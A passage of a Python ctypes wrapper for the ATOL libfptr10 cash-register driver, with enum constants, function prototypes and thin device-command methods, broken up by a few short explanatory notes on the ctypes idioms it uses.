LIBFPTR_PT_6,\n LIBFPTR_PT_7,\n LIBFPTR_PT_8,\n LIBFPTR_PT_9,\n LIBFPTR_PT_10,\n ) = RANGE(0, 10)\n\n (\n LIBFPTR_TAX_DEPARTMENT,\n LIBFPTR_TAX_VAT18,\n LIBFPTR_TAX_VAT10,\n LIBFPTR_TAX_VAT118,\n LIBFPTR_TAX_VAT110,\n LIBFPTR_TAX_VAT0,\n LIBFPTR_TAX_NO,\n ) = RANGE(0, 7)\n\n (\n LIBFPTR_EXTERNAL_DEVICE_DISPLAY,\n LIBFPTR_EXTERNAL_DEVICE_PINPAD,\n LIBFPTR_EXTERNAL_DEVICE_MODEM,\n LIBFPTR_EXTERNAL_DEVICE_BARCODE_SCANNER,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_DT_STATUS,\n LIBFPTR_DT_CASH_SUM,\n LIBFPTR_DT_UNIT_VERSION,\n LIBFPTR_DT_PICTURE_INFO,\n LIBFPTR_DT_LICENSE_ACTIVATED,\n LIBFPTR_DT_REGISTRATIONS_SUM,\n LIBFPTR_DT_REGISTRATIONS_COUNT,\n LIBFPTR_DT_PAYMENT_SUM,\n LIBFPTR_DT_CASHIN_SUM,\n LIBFPTR_DT_CASHIN_COUNT,\n LIBFPTR_DT_CASHOUT_SUM,\n LIBFPTR_DT_CASHOUT_COUNT,\n LIBFPTR_DT_REVENUE,\n LIBFPTR_DT_DATE_TIME,\n LIBFPTR_DT_SHIFT_STATE,\n LIBFPTR_DT_RECEIPT_STATE,\n LIBFPTR_DT_SERIAL_NUMBER,\n LIBFPTR_DT_MODEL_INFO,\n LIBFPTR_DT_RECEIPT_LINE_LENGTH,\n LIBFPTR_DT_CUTTER_RESOURCE,\n LIBFPTR_DT_STEP_RESOURCE,\n LIBFPTR_DT_TERMAL_RESOURCE,\n LIBFPTR_DT_ENVD_MODE,\n LIBFPTR_DT_SHIFT_TAX_SUM,\n LIBFPTR_DT_RECEIPT_TAX_SUM,\n LIBFPTR_DT_NON_NULLABLE_SUM,\n LIBFPTR_DT_RECEIPT_COUNT,\n LIBFPTR_DT_CANCELLATION_COUNT_ALL,\n LIBFPTR_DT_CANCELLATION_SUM,\n LIBFPTR_DT_CANCELLATION_SUM_ALL,\n LIBFPTR_DT_POWER_SOURCE_STATE,\n LIBFPTR_DT_CANCELLATION_COUNT,\n LIBFPTR_DT_NON_NULLABLE_SUM_BY_PAYMENTS,\n 
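Every constant group in this wrapper is declared by unpacking RANGE (the Python 2/3 shim defined at the top of the file) into a tuple of class attributes. The idiom in miniature:

# Consecutive integer constants by tuple unpacking, as above.
(
    PARITY_NO,
    PARITY_ODD,
    PARITY_EVEN,
) = range(0, 3)

assert PARITY_ODD == 1  # each name receives the next integer in the range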
LIBFPTR_DT_PRINTER_TEMPERATURE,\n LIBFPTR_DT_FATAL_STATUS,\n LIBFPTR_DT_MAC_ADDRESS,\n LIBFPTR_DT_DEVICE_UPTIME,\n LIBFPTR_DT_RECEIPT_BYTE_COUNT,\n LIBFPTR_DT_DISCOUNT_AND_SURCHARGE_SUM,\n LIBFPTR_DT_LK_USER_CODE,\n LIBFPTR_DT_LAST_SENT_OFD_DOCUMENT_DATE_TIME,\n ) = RANGE(0, 41)\n\n (\n LIBFPTR_FNDT_TAG_VALUE,\n LIBFPTR_FNDT_OFD_EXCHANGE_STATUS,\n LIBFPTR_FNDT_FN_INFO,\n LIBFPTR_FNDT_LAST_REGISTRATION,\n LIBFPTR_FNDT_LAST_RECEIPT,\n LIBFPTR_FNDT_LAST_DOCUMENT,\n LIBFPTR_FNDT_SHIFT,\n LIBFPTR_FNDT_FFD_VERSIONS,\n LIBFPTR_FNDT_VALIDITY,\n LIBFPTR_FNDT_REG_INFO,\n LIBFPTR_FNDT_DOCUMENTS_COUNT_IN_SHIFT,\n LIBFPTR_FNDT_ERRORS,\n LIBFPTR_FNDT_TICKET_BY_DOC_NUMBER,\n LIBFPTR_FNDT_DOCUMENT_BY_NUMBER,\n ) = RANGE(0, 14)\n\n (\n LIBFPTR_UT_FIRMWARE,\n LIBFPTR_UT_CONFIGURATION,\n LIBFPTR_UT_TEMPLATES,\n LIBFPTR_UT_CONTROL_UNIT,\n LIBFPTR_UT_BOOT,\n ) = RANGE(0, 5)\n\n (\n LIBFPTR_FNOP_REGISTRATION,\n LIBFPTR_FNOP_CHANGE_FN,\n LIBFPTR_FNOP_CHANGE_PARAMETERS,\n LIBFPTR_FNOP_CLOSE_ARCHIVE,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_OFD_CHANNEL_NONE,\n LIBFPTR_OFD_CHANNEL_USB,\n LIBFPTR_OFD_CHANNEL_PROTO,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_PST_POWER_SUPPLY,\n LIBFPTR_PST_RTC_BATTERY,\n LIBFPTR_PST_BATTERY,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_RT_LAST_DOCUMENT_LINES,\n LIBFPTR_RT_FN_DOCUMENT_TLVS,\n LIBFPTR_RT_EXEC_USER_SCRIPT,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_LOG_ERROR,\n LIBFPTR_LOG_WARN,\n LIBFPTR_LOG_INFO,\n LIBFPTR_LOG_DEBUG,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_NT_FURS,\n LIBFPTR_NT_MEDICINES,\n LIBFPTR_NT_TOBACCO,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_UMO_GET_SIZE,\n LIBFPTR_UMO_READ_DATA,\n LIBFPTR_UMO_WRITE_DATA,\n LIBFPTR_UMO_READ_STRING,\n LIBFPTR_UMO_WRITE_STRING,\n LIBFPTR_UMO_COMMIT,\n ) = RANGE(0, 6)\n\n (\n LIBFPTR_GUI_PARENT_NATIVE,\n LIBFPTR_GUI_PARENT_QT,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_DEFER_NONE,\n LIBFPTR_DEFER_PRE,\n LIBFPTR_DEFER_POST,\n ) = RANGE(0, 3)\n\n LIBFPTR_SETTING_LIBRARY_PATH = \"LibraryPath\"\n\n LIBFPTR_SETTING_MODEL = \"Model\"\n\n LIBFPTR_SETTING_PORT = \"Port\"\n\n LIBFPTR_SETTING_BAUDRATE = \"BaudRate\"\n\n LIBFPTR_SETTING_BITS = \"Bits\"\n\n LIBFPTR_SETTING_PARITY = \"Parity\"\n\n LIBFPTR_SETTING_STOPBITS = \"StopBits\"\n\n LIBFPTR_SETTING_IPADDRESS = \"IPAddress\"\n\n LIBFPTR_SETTING_IPPORT = \"IPPort\"\n\n LIBFPTR_SETTING_MACADDRESS = \"MACAddress\"\n\n LIBFPTR_SETTING_COM_FILE = \"ComFile\"\n\n LIBFPTR_SETTING_USB_DEVICE_PATH = \"UsbDevicePath\"\n\n LIBFPTR_SETTING_BT_AUTOENABLE = \"AutoEnableBluetooth\"\n\n LIBFPTR_SETTING_BT_AUTODISABLE = \"AutoDisableBluetooth\"\n\n LIBFPTR_SETTING_ACCESS_PASSWORD = \"AccessPassword\"\n\n LIBFPTR_SETTING_USER_PASSWORD = \"UserPassword\"\n\n LIBFPTR_SETTING_OFD_CHANNEL = \"OfdChannel\"\n\n LIBFPTR_SETTING_EXISTED_COM_FILES = \"ExistedComFiles\"\n\n LIBFPTR_MODEL_UNKNOWN = 0\n\n LIBFPTR_MODEL_ATOL_25F = 57\n\n LIBFPTR_MODEL_ATOL_30F = 61\n\n LIBFPTR_MODEL_ATOL_55F = 62\n\n LIBFPTR_MODEL_ATOL_22F = 63\n\n LIBFPTR_MODEL_ATOL_52F = 64\n\n LIBFPTR_MODEL_ATOL_11F = 67\n\n LIBFPTR_MODEL_ATOL_77F = 69\n\n LIBFPTR_MODEL_ATOL_90F = 72\n\n LIBFPTR_MODEL_ATOL_60F = 75\n\n LIBFPTR_MODEL_ATOL_42FS = 77\n\n LIBFPTR_MODEL_ATOL_15F = 78\n\n LIBFPTR_MODEL_ATOL_50F = 80\n\n LIBFPTR_MODEL_ATOL_20F = 81\n\n LIBFPTR_MODEL_ATOL_91F = 82\n\n LIBFPTR_MODEL_ATOL_92F = 84\n\n LIBFPTR_MODEL_ATOL_SIGMA_10 = 86\n\n LIBFPTR_MODEL_ATOL_50 = 100\n\n LIBFPTR_MODEL_ATOL_AUTO = 500\n\n LIBFPTR_PORT_BR_1200 = 1200\n\n LIBFPTR_PORT_BR_2400 = 2400\n\n LIBFPTR_PORT_BR_4800 = 4800\n\n LIBFPTR_PORT_BR_9600 = 9600\n\n LIBFPTR_PORT_BR_19200 = 19200\n\n LIBFPTR_PORT_BR_38400 = 38400\n\n 
LIBFPTR_PORT_BR_57600 = 57600\n\n LIBFPTR_PORT_BR_115200 = 115200\n\n LIBFPTR_FNS_INITIAL = 0\n\n LIBFPTR_FNS_CONFIGURED = 1\n\n LIBFPTR_FNS_FISCAL_MODE = 3\n\n LIBFPTR_FNS_POSTFISCAL_MODE = 7\n\n LIBFPTR_FNS_ACCESS_ARCHIVE = 15\n\n LIBFPTR_RT_CLOSED = 0\n\n LIBFPTR_RT_SELL = 1\n\n LIBFPTR_RT_SELL_RETURN = 2\n\n LIBFPTR_RT_SELL_CORRECTION = 7\n\n LIBFPTR_RT_SELL_RETURN_CORRECTION = 8\n\n LIBFPTR_RT_BUY = 4\n\n LIBFPTR_RT_BUY_RETURN = 5\n\n LIBFPTR_RT_BUY_CORRECTION = 9\n\n LIBFPTR_RT_BUY_RETURN_CORRECTION = 10\n\n LIBFPTR_FFD_UNKNOWN = 0\n\n LIBFPTR_FFD_1_0 = 100\n\n LIBFPTR_FFD_1_0_5 = 105\n\n LIBFPTR_FFD_1_1 = 110\n\n LIBFPTR_TT_DEFAULT = 0\n\n LIBFPTR_TT_OSN = 1\n\n LIBFPTR_TT_USN_INCOME = 2\n\n LIBFPTR_TT_USN_INCOME_OUTCOME = 4\n\n LIBFPTR_TT_ENVD = 8\n\n LIBFPTR_TT_ESN = 16\n\n LIBFPTR_TT_PATENT = 32\n\n LIBFPTR_AT_NONE = 0\n\n LIBFPTR_AT_BANK_PAYING_AGENT = 1\n\n LIBFPTR_AT_BANK_PAYING_SUBAGENT = 2\n\n LIBFPTR_AT_PAYING_AGENT = 4\n\n LIBFPTR_AT_PAYING_SUBAGENT = 8\n\n LIBFPTR_AT_ATTORNEY = 16\n\n LIBFPTR_AT_COMMISSION_AGENT = 32\n\n LIBFPTR_AT_ANOTHER = 64\n\n LIBFPTR_FN_DOC_REGISTRATION = 1\n\n LIBFPTR_FN_DOC_OPEN_SHIFT = 2\n\n LIBFPTR_FN_DOC_RECEIPT = 3\n\n LIBFPTR_FN_DOC_BSO = 4\n\n LIBFPTR_FN_DOC_CLOSE_SHIFT = 5\n\n LIBFPTR_FN_DOC_CLOSE_FN = 6\n\n LIBFPTR_FN_DOC_OPERATOR_CONFIRMATION = 7\n\n LIBFPTR_FN_DOC_REREGISTRATION = 11\n\n LIBFPTR_FN_DOC_EXCHANGE_STATUS = 21\n\n LIBFPTR_FN_DOC_CORRECTION = 31\n\n LIBFPTR_FN_DOC_BSO_CORRECTION = 41\n\n\n DEFAULT_BUFF_SIZE = 512\n\n CREATE_METHOD = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.POINTER(ctypes.c_void_p))\n DESTROY_METHOD = ctypes.CFUNCTYPE(None, ctypes.POINTER(ctypes.c_void_p))\n GET_VERSION_METHOD = ctypes.CFUNCTYPE(ctypes.c_char_p)\n\n METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p)\n\n IS_OPENED_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p)\n\n GET_ERROR_CODE_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p)\n GET_ERROR_DESCRIPTION_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_int)\n\n SET_SETTINGS_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p)\n GET_SETTINGS_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_int)\n\n SET_SINGLE_SETTING_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_wchar_p)\n GET_SINGLE_SETTING_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_wchar_p,\n ctypes.c_int)\n\n SET_BYTEARRAY_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_ubyte), ctypes.c_int)\n GET_BYTEARRAY_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_ubyte), ctypes.c_int)\n\n SET_INT_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_uint)\n GET_INT_METHOD = ctypes.CFUNCTYPE(ctypes.c_uint,\n ctypes.c_void_p,\n ctypes.c_int)\n\n SET_BOOL_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_int)\n GET_BOOL_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int)\n\n SET_DOUBLE_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_double)\n GET_DOUBLE_METHOD = ctypes.CFUNCTYPE(ctypes.c_double,\n ctypes.c_void_p,\n ctypes.c_int)\n\n SET_STRING_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_wchar_p)\n GET_STRING_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_wchar_p, 
ctypes.c_int)\n\n SET_DATETIME_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_int,\n ctypes.c_int,\n ctypes.c_int)\n GET_DATETIME_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int))\n\n LOG_WRITE_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_wchar_p,\n ctypes.c_int,\n ctypes.c_wchar_p)\n\n SHOW_PROPERTIES_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_void_p)\n\n def __init__(self, lib_path):\n assert sys.version_info >= (2, 6)\n self.lib_path = lib_path\n if platform.system() == 'Windows':\n if not self.lib_path.endswith('fptr10.dll'):\n self.lib_path = os.path.join(self.lib_path, 'fptr10.dll')\n try:\n ctypes.CDLL(os.path.join(os.path.dirname(self.lib_path), 'msvcp140.dll'), mode=ctypes.RTLD_LOCAL)\n self.library = ctypes.CDLL(self.lib_path, mode=ctypes.RTLD_LOCAL)\n except OSError:\n self.lib_path = os.path.join(QueryValueEx(OpenKey(HKEY_LOCAL_MACHINE, \"Software\\\\ATOL\\\\Drivers\\\\10.0\\\\KKT\"), \"INSTALL_DIR\")[0], 'bin\\\\fptr10.dll')\n ctypes.CDLL(os.path.join(os.path.dirname(self.lib_path), 'msvcp140.dll'), mode=ctypes.RTLD_LOCAL)\n self.library = ctypes.CDLL(self.lib_path, mode=ctypes.RTLD_LOCAL)\n else:\n if not self.lib_path.endswith('libfptr10.so'):\n self.lib_path = os.path.join(self.lib_path, 'libfptr10.so')\n self.library = ctypes.CDLL(self.lib_path, mode=ctypes.RTLD_LOCAL)\n \n self.interface = ctypes.c_void_p(0)\n _create = self.CREATE_METHOD(('libfptr_create', self.library))\n _create(ctypes.pointer(self.interface))\n\n self._setByteArray = self.SET_BYTEARRAY_METHOD(\n ('libfptr_set_param_bytearray', self.library))\n self._getByteArray = self.GET_BYTEARRAY_METHOD(\n ('libfptr_get_param_bytearray', self.library))\n self._setInt = self.SET_INT_METHOD(('libfptr_set_param_int', self.library))\n self._getInt = self.GET_INT_METHOD(('libfptr_get_param_int', self.library))\n self._setBool = self.SET_BOOL_METHOD(('libfptr_set_param_bool', self.library))\n self._getBool = self.GET_BOOL_METHOD(('libfptr_get_param_bool', self.library))\n self._setDouble = self.SET_DOUBLE_METHOD(('libfptr_set_param_double', self.library))\n self._getDouble = self.GET_DOUBLE_METHOD(('libfptr_get_param_double', self.library))\n self._setDateTime = self.SET_DATETIME_METHOD(('libfptr_set_param_datetime', self.library))\n self._getDateTime = self.GET_DATETIME_METHOD(('libfptr_get_param_datetime', self.library))\n self._setString = self.SET_STRING_METHOD(('libfptr_set_param_str', self.library))\n self._getString = self.GET_STRING_METHOD(('libfptr_get_param_str', self.library))\n self._setSettings = self.SET_SETTINGS_METHOD(('libfptr_set_settings', self.library))\n self._getSettings = self.GET_SETTINGS_METHOD(('libfptr_get_settings', self.library))\n self._getSingleSetting = self.GET_SINGLE_SETTING_METHOD(\n ('libfptr_get_single_setting', self.library))\n self._setSingleSetting = self.SET_SINGLE_SETTING_METHOD(\n ('libfptr_set_single_setting', self.library))\n self._getVersion = self.GET_VERSION_METHOD(('libfptr_get_version_string', self.library))\n self._isOpened = self.IS_OPENED_METHOD(('libfptr_is_opened', self.library))\n self._errorCode = self.GET_ERROR_CODE_METHOD(('libfptr_error_code', self.library))\n self._errorDescription = 
self.GET_ERROR_DESCRIPTION_METHOD(('libfptr_error_description', self.library))\n self._logWrite = self.LOG_WRITE_METHOD(('libfptr_log_write', self.library))\n self._showProperties = self.SHOW_PROPERTIES_METHOD(('libfptr_show_properties', self.library))\n\n def __del__(self):\n destroy = self.DESTROY_METHOD(('libfptr_destroy', self.library))\n destroy(ctypes.pointer(self.interface))\n\n def version(self):\n return self._getVersion()\n\n def logWrite(self, tag, level, message):\n return self._logWrite(tag, level, message)\n\n def showProperties(self, parentType, parent):\n return self._showProperties(self.interface, parentType, parent)\n\n def isOpened(self):\n return self._isOpened(self.interface)\n\n def errorCode(self):\n return self._errorCode(self.interface)\n\n def errorDescription(self):\n buff = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._errorDescription(self.interface, buff, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n buff = ctypes.create_unicode_buffer(size)\n self._errorDescription(self.interface, buff, size)\n return buff.value\n\n def setSettings(self, settings):\n return self._setSettings(self.interface, json.dumps(settings))\n\n def getSettings(self):\n buff = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._getSettings(self.interface, buff, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n buff = ctypes.create_unicode_buffer(size)\n self._getSettings(self.interface, buff, size)\n return json.loads(buff.value)\n\n def setSingleSetting(self, key, value):\n self._setSingleSetting(self.interface, key, value)\n\n def getSingleSetting(self, key):\n buff = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._getSingleSetting(self.interface, key, buff, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n buff = ctypes.create_unicode_buffer(size)\n self._getSingleSetting(self.interface, key, buff, size)\n return buff.value\n\n def setParam(self, paramId, param):\n if isinstance(param, int):\n self._setInt(self.interface, ctypes.c_int(paramId), ctypes.c_uint(param))\n elif isinstance(param, bool):\n self._setBool(self.interface, ctypes.c_int(paramId), ctypes.c_int(param))\n elif isinstance(param, float):\n self._setDouble(self.interface, ctypes.c_int(paramId), ctypes.c_double(param))\n elif isinstance(param, list):\n self._setByteArray(self.interface, ctypes.c_int(paramId),\n (ctypes.c_ubyte * len(param))(*param), len(param))\n elif isinstance(param, bytearray):\n self._setByteArray(self.interface, ctypes.c_int(paramId),\n (ctypes.c_ubyte * len(param))(*param), len(param))\n elif isinstance(param, datetime.datetime):\n self._setDateTime(self.interface, ctypes.c_int(paramId), param.date().year,\n param.date().month,\n param.date().day,\n param.time().hour, param.time().minute, param.time().second)\n elif isinstance(param, TEXT):\n self._setString(self.interface, ctypes.c_int(paramId), ctypes.c_wchar_p(param))\n else:\n raise Exception(u'Неподдерживаемый тип параметра')\n\n def getParamInt(self, paramId):\n value = self._getInt(self.interface, ctypes.c_int(paramId))\n return value\n\n def getParamBool(self, paramId):\n value = self._getBool(self.interface, ctypes.c_int(paramId))\n return value != 0\n\n def getParamDouble(self, paramId):\n value = self._getDouble(self.interface, ctypes.c_int(paramId))\n return value\n\n def getParamByteArray(self, paramId):\n value = (ctypes.c_ubyte * self.DEFAULT_BUFF_SIZE)()\n size = self._getByteArray(self.interface, ctypes.c_int(paramId),\n 
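__init__ above binds each export with the same two-step ctypes pattern: declare the C signature with CFUNCTYPE, then instantiate the prototype with a (symbol_name, loaded_library) tuple. The same pattern applied to libc's strlen; CDLL(None) resolving the current process is a POSIX assumption for the demo, not something the wrapper itself relies on:

import ctypes

libc = ctypes.CDLL(None)  # POSIX: load symbols from the current process
STRLEN = ctypes.CFUNCTYPE(ctypes.c_size_t, ctypes.c_char_p)  # size_t strlen(const char *)
strlen = STRLEN(('strlen', libc))  # bind by (name, library), as the wrapper does
assert strlen(b'fptr10') == 6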
ctypes.cast(value, ctypes.POINTER(ctypes.c_ubyte)),\n self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n answer = (ctypes.c_ubyte * size)()\n size = self._getByteArray(self.interface, ctypes.c_int(paramId),\n ctypes.cast(value, ctypes.POINTER(ctypes.c_ubyte)), size)\n return value[:size]\n\n def getParamDateTime(self, paramId):\n year = ctypes.c_int(0)\n month = ctypes.c_int(0)\n day = ctypes.c_int(0)\n hour = ctypes.c_int(0)\n minute = ctypes.c_int(0)\n second = ctypes.c_int(0)\n self._getDateTime(self.interface, ctypes.c_int(paramId), ctypes.pointer(year),\n ctypes.pointer(month),\n ctypes.pointer(day),\n ctypes.pointer(hour), ctypes.pointer(minute), ctypes.pointer(second))\n return datetime.datetime(year.value, month.value, day.value, hour.value, minute.value,\n second.value)\n\n def getParamString(self, paramId):\n value = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._getString(self.interface, ctypes.c_int(paramId), value, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n value = ctypes.create_unicode_buffer(size)\n self._getString(self.interface, ctypes.c_int(paramId), value, size)\n return value.value\n\n def applySingleSettings(self):\n _method = self.METHOD(('libfptr_apply_single_settings', self.library))\n return _method(self.interface)\n\n def open(self):\n _method = self.METHOD(('libfptr_open', self.library))\n return _method(self.interface)\n\n def close(self):\n _method = self.METHOD(('libfptr_close', self.library))\n return _method(self.interface)\n\n def resetParams(self):\n _method = self.METHOD(('libfptr_reset_params', self.library))\n return _method(self.interface)\n\n def runCommand(self):\n _method = self.METHOD(('libfptr_run_command', self.library))\n return _method(self.interface)\n\n def beep(self):\n _method = self.METHOD(('libfptr_beep', self.library))\n return _method(self.interface)\n\n def openDrawer(self):\n _method = self.METHOD(('libfptr_open_drawer', self.library))\n return _method(self.interface)\n\n def cut(self):\n _method = self.METHOD(('libfptr_cut', self.library))\n return _method(self.interface)\n\n def devicePoweroff(self):\n _method = self.METHOD(('libfptr_device_poweroff', self.library))\n return _method(self.interface)\n\n def deviceReboot(self):\n _method = self.METHOD(('libfptr_device_reboot', self.library))\n return _method(self.interface)\n\n def openShift(self):\n _method = self.METHOD(('libfptr_open_shift', self.library))\n return _method(self.interface)\n\n def resetSummary(self):\n _method = self.METHOD(('libfptr_reset_summary', self.library))\n return _method(self.interface)\n\n def initDevice(self):\n _method = self.METHOD(('libfptr_init_device', self.library))\n return _method(self.interface)\n\n def queryData(self):\n _method = self.METHOD(('libfptr_query_data', self.library))\n return _method(self.interface)\n\n def cashIncome(self):\n _method = self.METHOD(('libfptr_cash_income', self.library))\n return _method(self.interface)\n\n def cashOutcome(self):\n _method = self.METHOD(('libfptr_cash_outcome', self.library))\n return _method(self.interface)\n\n def openReceipt(self):\n _method = self.METHOD(('libfptr_open_receipt', self.library))\n return _method(self.interface)\n\n def cancelReceipt(self):\n _method = self.METHOD(('libfptr_cancel_receipt', self.library))\n return _method(self.interface)\n\n def closeReceipt(self):\n _method = self.METHOD(('libfptr_close_receipt', self.library))\n return _method(self.interface)\n\n def checkDocumentClosed(self):\n _method = 
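errorDescription, getSettings, getSingleSetting and getParamString above all share a two-pass buffer protocol: call once with a 512-character buffer, and if the return value reports a larger size, allocate exactly that much and call again. Factored into a helper (hypothetical, not part of the driver API):

import ctypes

def read_wide_string(getter, *args, default_size=512):
    # Pass 1: try a default-sized buffer.
    buff = ctypes.create_unicode_buffer(default_size)
    size = getter(*args, buff, default_size)
    if size > default_size:
        # Pass 2: retry once at the exact size the library reported.
        buff = ctypes.create_unicode_buffer(size)
        getter(*args, buff, size)
    return buff.value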
self.METHOD(('libfptr_check_document_closed', self.library))\n return _method(self.interface)\n\n def receiptTotal(self):\n _method = self.METHOD(('libfptr_receipt_total', self.library))\n return _method(self.interface)\n\n def receiptTax(self):\n _method = self.METHOD(('libfptr_receipt_tax', self.library))\n return _method(self.interface)\n\n def registration(self):\n _method = self.METHOD(('libfptr_registration', self.library))\n return _method(self.interface)\n\n def payment(self):\n _method = self.METHOD(('libfptr_payment', self.library))\n return _method(self.interface)\n\n def report(self):\n _method = self.METHOD(('libfptr_report', self.library))\n return _method(self.interface)\n\n def printText(self):\n _method = self.METHOD(('libfptr_print_text', self.library))\n return _method(self.interface)\n\n def printCliche(self):\n _method = self.METHOD(('libfptr_print_cliche', self.library))\n return _method(self.interface)\n\n def beginNonfiscalDocument(self):\n _method = self.METHOD(('libfptr_begin_nonfiscal_document', self.library))\n return _method(self.interface)\n\n def endNonfiscalDocument(self):\n _method = self.METHOD(('libfptr_end_nonfiscal_document', self.library))\n return _method(self.interface)\n\n def printBarcode(self):\n _method = self.METHOD(('libfptr_print_barcode', self.library))\n return _method(self.interface)\n\n def printPicture(self):\n _method = self.METHOD(('libfptr_print_picture', self.library))\n return _method(self.interface)\n\n def printPictureByNumber(self):\n _method = self.METHOD(('libfptr_print_picture_by_number', self.library))\n return _method(self.interface)\n\n def uploadPictureFromFile(self):\n _method = self.METHOD(('libfptr_upload_picture_from_file', self.library))\n return _method(self.interface)\n\n def clearPictures(self):\n _method = self.METHOD(('libfptr_clear_pictures', self.library))\n return _method(self.interface)\n\n def writeDeviceSettingRaw(self):\n _method = self.METHOD(('libfptr_write_device_setting_raw', self.library))\n return _method(self.interface)\n\n def readDeviceSettingRaw(self):\n _method = self.METHOD(('libfptr_read_device_setting_raw', self.library))\n return _method(self.interface)\n\n def commitSettings(self):\n _method = self.METHOD(('libfptr_commit_settings', self.library))\n return _method(self.interface)\n\n def initSettings(self):\n _method = self.METHOD(('libfptr_init_settings', self.library))\n return _method(self.interface)\n\n def resetSettings(self):\n _method = self.METHOD(('libfptr_reset_settings', self.library))\n return _method(self.interface)\n\n def writeDateTime(self):\n _method = self.METHOD(('libfptr_write_date_time', self.library))\n return _method(self.interface)\n\n def writeLicense(self):\n _method = self.METHOD(('libfptr_write_license', self.library))\n return _method(self.interface)\n\n def fnOperation(self):\n _method = self.METHOD(('libfptr_fn_operation', self.library))\n return _method(self.interface)\n\n def fnQueryData(self):\n _method = self.METHOD(('libfptr_fn_query_data', self.library))\n return _method(self.interface)\n\n def fnWriteAttributes(self):\n _method = self.METHOD(('libfptr_fn_write_attributes', self.library))\n return _method(self.interface)\n\n def externalDevicePowerOn(self):\n _method = self.METHOD(('libfptr_external_device_power_on', self.library))\n return _method(self.interface)\n\n def externalDevicePowerOff(self):\n _method = self.METHOD(('libfptr_external_device_power_off', self.library))\n return _method(self.interface)\n\n def externalDeviceWriteData(self):\n 
_method = self.METHOD(('libfptr_external_device_write_data', self.library))\n        return _method(self.interface)\n\n    def externalDeviceReadData(self):\n        _method = self.METHOD(('libfptr_external_device_read_data', self.library))\n        return _method(self.interface)\n\n    def operatorLogin(self):\n        _method = self.METHOD(('libfptr_operator_login', self.library))\n        return _method(self.interface)\n\n    def processJson(self):\n        _method = self.METHOD(('libfptr_process_json', self.library))\n        return _method(self.interface)\n\n    def readDeviceSetting(self):\n        _method = self.METHOD(('libfptr_read_device_setting', self.library))\n        return _method(self.interface)\n\n    def writeDeviceSetting(self):\n        _method = self.METHOD(('libfptr_write_device_setting', self.library))\n        return _method(self.interface)\n\n    def beginReadRecords(self):\n        _method = self.METHOD(('libfptr_begin_read_records', self.library))\n        return _method(self.interface)\n\n    def readNextRecord(self):\n        _method = self.METHOD(('libfptr_read_next_record', self.library))\n        return _method(self.interface)\n\n    def endReadRecords(self):\n        _method = self.METHOD(('libfptr_end_read_records', self.library))\n        return _method(self.interface)\n\n    def userMemoryOperation(self):\n        _method = self.METHOD(('libfptr_user_memory_operation', self.library))\n        return _method(self.interface)\n\n    def continuePrint(self):\n        _method = self.METHOD(('libfptr_continue_print', self.library))\n        return _method(self.interface)\n\n    def initMgm(self):\n        _method = self.METHOD(('libfptr_init_mgm', self.library))\n        return _method(self.interface)\n\n    def utilFormTlv(self):\n        _method = self.METHOD(('libfptr_util_form_tlv', self.library))\n        return _method(self.interface)\n\n    def utilFormNomenclature(self):\n        _method = 